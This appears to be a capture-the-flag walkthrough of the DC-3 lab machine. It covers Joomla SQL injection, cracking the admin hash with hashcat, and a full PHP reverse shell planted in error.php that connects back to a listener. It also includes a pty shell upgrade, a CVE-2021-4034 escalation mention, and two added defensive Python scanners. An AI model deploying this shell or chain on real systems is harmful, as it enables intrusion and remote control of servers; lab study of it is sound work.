DC-3


author: leadlife

date: 2023/5/15

blog: https://tripse.github.io/

The tools used in this test are as follows:

  • Information gathering: nmap, fscan, cmseek, searchsploit
  • Hash identification: hashid
  • Brute force: hashcat
  • Internal information gathering: none
  • Privilege escalation: none

External information gathering

Nmap ICMP scan to discover hosts

Of the hosts found, 10.10.10.130 is the target IP

```shell
sudo nmap -sP 10.10.10.0/24 -T4 --min-rate 10000
```

```
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-15 18:08 CST
Nmap scan report for 10.10.10.130
Host is up (0.000092s latency).
MAC Address: 08:00:27:81:03:54 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.254
Host is up (0.00026s latency).
MAC Address: 00:50:56:FC:DC:5C (VMware)
Nmap scan report for 10.10.10.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 0.35 seconds
```

fscan port discovery

Only port 80 was found open

```shell
sudo fscan -h 10.10.10.130 -t 30 -p 0-65535
```

```
   ___                              _
  / _ \ ___ ___ _ __ __ _ ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.1
start infoscan
(icmp) Target 10.10.10.130 is alive
[*] Icmp alive hosts len is: 1
10.10.10.130:80 open
[*] alive ports len is: 1
start vulscan
[*] WebTitle: http://10.10.10.130 code:200 len:7082 title:Home
[+] http://10.10.10.130 poc-yaml-joomla-cve-2017-8917-sqli
已完成 1/1
[*] 扫描结束,耗时: 3.732715478s
```
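fscan prints its results as plain text, so turning a run like the one above into a per-host summary (open ports plus any `poc-yaml-*` hits, with the CVE pulled out of the POC name) is a useful triage step. The following is an added example, not the author's code or part of fscan; the sample output is constructed to mirror the scan shown above.

```python
import re
from urllib.parse import urlsplit

# Constructed sample, modelled on the fscan run above (not the author's capture).
SAMPLE_FSCAN_OUTPUT = """\
fscan version: 1.8.1
start infoscan
(icmp) Target 10.10.10.130 is alive
[*] Icmp alive hosts len is: 1
10.10.10.130:80 open
[*] alive ports len is: 1
start vulscan
[*] WebTitle: http://10.10.10.130 code:200 len:7082 title:Home
[+] http://10.10.10.130 poc-yaml-joomla-cve-2017-8917-sqli
"""

PORT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+) open$")
POC_RE = re.compile(r"^\[\+\] (\S+) (poc-yaml-\S+)$")
CVE_RE = re.compile(r"cve-(\d{4}-\d{4,})", re.IGNORECASE)


def parse_fscan(text):
    """Return ({host: [ports]}, [findings]) from fscan's plain-text output.

    Each finding carries the URL, the POC name and, when the POC name embeds
    a CVE id, the normalised id (e.g. 'CVE-2017-8917')."""
    open_ports, findings = {}, []
    for line in text.splitlines():
        line = line.strip()
        m = PORT_RE.match(line)
        if m:
            open_ports.setdefault(m.group(1), []).append(int(m.group(2)))
            continue
        m = POC_RE.match(line)
        if m:
            url, poc = m.groups()
            cve = CVE_RE.search(poc)
            findings.append({"url": url, "poc": poc,
                             "cve": "CVE-" + cve.group(1) if cve else None})
    return open_ports, findings


def summarize(text):
    """Group ports and POC hits by host so a defender can see, per asset,
    what is exposed and which checks fired against it."""
    open_ports, findings = parse_fscan(text)
    report = {h: {"ports": sorted(p), "pocs": []} for h, p in open_ports.items()}
    for f in findings:
        host = urlsplit(f["url"]).hostname
        report.setdefault(host, {"ports": [], "pocs": []})["pocs"].append(f["poc"])
    return report
```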

Detailed port scan with Nmap

  • To avoid missing any ports, the host is scanned once more with nmap

  • The output shows that the web application is Joomla

```shell
sudo nmap -sS -sV -sC -T4 --min-rate 10000 -O -oN nmap.all 10.10.10.130 -p0-65535
```

```
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-15 18:11 CST
Nmap scan report for 10.10.10.130
Host is up (0.00026s latency).
Not shown: 65535 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:81:03:54 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds
```

Identifying the CMS

Visit the web page to confirm that it is Joomla


CMSeek to determine the CMS version


searchsploit to look up vulnerabilities for this CMS version

It is very likely that a SQL injection exists, so the plan is as follows:

  • Use the SQL injection to obtain the backend administrator password from the database
  • Get a shell from the backend


Getting a shell

Exploiting the vulnerability

First, read the description of the vulnerability


Here a PHP HTTP server is started so the exploit script can be used for testing


Visit 127.0.0.1:1234 locally and use it as follows:


Identifying the hash


Cracking the hash

hashcat is used for this

Password wordlist: seclists: /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt

```shell
hashcat -a 0 -m 3200 hash.txt /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt
```

Password obtained: snoopy


Logging in to the backend and getting a shell

Go to the backend: http://10.10.10.130/administrator/index.php


php-reverse-shell.php is used here; its contents are as follows:

Remember to change the IP and port to match the nc listener

```php
<?php

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.10.1';  // CHANGE THIS
$port = 1234;        // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0); // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    global $daemon;  // the flag is set at file scope, so it must be imported here
    if (!$daemon) {
        print "$string\n";
    }
}

?>
```

The steps are as follows:


Delete the original error.php code and paste in the contents of php-reverse-shell.php


Start a listener locally:

```shell
nc -lvnp 1234
```

Visit: http://10.10.10.130/templates/beez3/error.php

This returns the reverse shell
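The foothold above is a stock Joomla template file (`templates/beez3/error.php`) overwritten from the admin backend, which is exactly what a file-integrity or content check on the templates tree should catch: a theme renders HTML and has no reason to call `fsockopen`, `proc_open` or an interactive `/bin/sh`. The following scanner is an added example, not the author's code or part of Joomla; it builds a constructed Joomla tree in a temp directory with one clean file and one carrying a fragment of the shell shown above.

```python
import os
import re
import tempfile

# Indicators that should never appear in a Joomla template's PHP files.
INDICATORS = {
    "fsockopen": re.compile(r"\bfsockopen\s*\("),
    "proc_open": re.compile(r"\bproc_open\s*\("),
    "exec-family": re.compile(r"\b(?:shell_exec|exec|system|passthru|popen)\s*\("),
    "interactive-shell": re.compile(r"/bin/(?:ba)?sh\s+-i"),
}


def scan_file(path):
    """Return the names of the indicators present in one PHP file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return [name for name, rx in INDICATORS.items() if rx.search(src)]


def scan_templates(joomla_root):
    """Walk <joomla_root>/templates and map each flagged .php file
    (path relative to the Joomla root, '/'-separated) to its indicators."""
    hits = {}
    base = os.path.join(joomla_root, "templates")
    for dirpath, _, files in os.walk(base):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            found = scan_file(path)
            if found:
                rel = os.path.relpath(path, joomla_root).replace(os.sep, "/")
                hits[rel] = found
    return hits


def demo_scan():
    """Constructed fixture: a benign template file beside an error.php that
    was replaced with a reverse-shell fragment like the one on this page."""
    root = tempfile.mkdtemp()
    tpl = os.path.join(root, "templates", "beez3")
    os.makedirs(tpl)
    with open(os.path.join(tpl, "index.php"), "w") as fh:
        fh.write("<?php defined('_JEXEC') or die; echo '<html></html>'; ?>\n")
    with open(os.path.join(tpl, "error.php"), "w") as fh:
        fh.write("<?php $shell = 'uname -a; w; id; /bin/sh -i';\n"
                 "$sock = fsockopen($ip, $port, $errno, $errstr, 30);\n"
                 "$process = proc_open($shell, $descriptorspec, $pipes); ?>\n")
    return scan_templates(root)
```

Pointed at a real install, `scan_templates("/var/www/html")` lists only the files that trip an indicator, so a clean tree returns an empty dict.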


Internal information gathering

Upgrading the shell

  • Get a TTY shell: python -c 'import pty;pty.spawn("/bin/bash")'

  • Set the terminal environment variable: export TERM=xterm

Kernel and distribution


SUID

While enumerating SUID binaries, this program was found; CVE-2021-4034 can be used directly for local privilege escalation


SUDO

No sudo rights


Privilege escalation

First start a Python web server locally to transfer the files


Compile and escalate privileges


End Flag
